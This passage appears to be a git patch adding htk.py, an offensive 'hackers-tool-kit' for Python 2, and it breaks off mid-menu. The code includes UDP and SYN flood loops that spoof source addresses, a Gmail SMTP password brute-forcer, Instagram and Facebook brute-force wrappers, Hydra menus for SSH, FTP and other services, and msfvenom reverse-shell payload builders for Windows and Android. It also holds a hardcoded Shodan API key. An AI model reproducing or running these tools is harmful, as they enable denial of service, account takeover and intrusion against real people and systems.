x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - found = True -mainbanner() -main() From 3a0f4e12ca6079bf806761dc4a2ba336b30fd76e Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 03:17:06 -0400 Subject: [PATCH 069/214] Add files via upload --- htk.py | 2029 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2029 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..973e90c --- /dev/null +++ b/htk.py @@ -0,0 +1,2029 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = 